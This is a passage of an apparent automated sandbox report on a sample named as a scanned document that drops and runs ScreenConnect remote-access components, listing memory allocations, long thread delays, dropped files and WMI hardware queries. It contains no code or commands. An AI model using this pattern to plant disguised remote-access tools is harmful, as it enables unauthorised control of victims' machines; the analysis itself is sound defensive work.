                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: BA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 11F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 31F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1A3F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1B2F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598880Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597959Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597217Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596883Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595783Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595565Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594044Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592883Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592571Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6522Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3130Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe TID: 6848Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -599607s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -599500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -599390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -599235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -599110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -598880s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597959s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597438s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597217s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596997s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596883s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -596015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -595906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -595783s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -595565s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -595141s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -595031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -594044s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -593000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -592883s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -592687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564Thread sleep time: -592571s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 1120Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 7684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 5560Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00834A4B FindFirstFileExA,0_2_00834A4B
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598880Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597959Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597217Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596883Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595783Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595565Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594044Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593344Jump to behavior
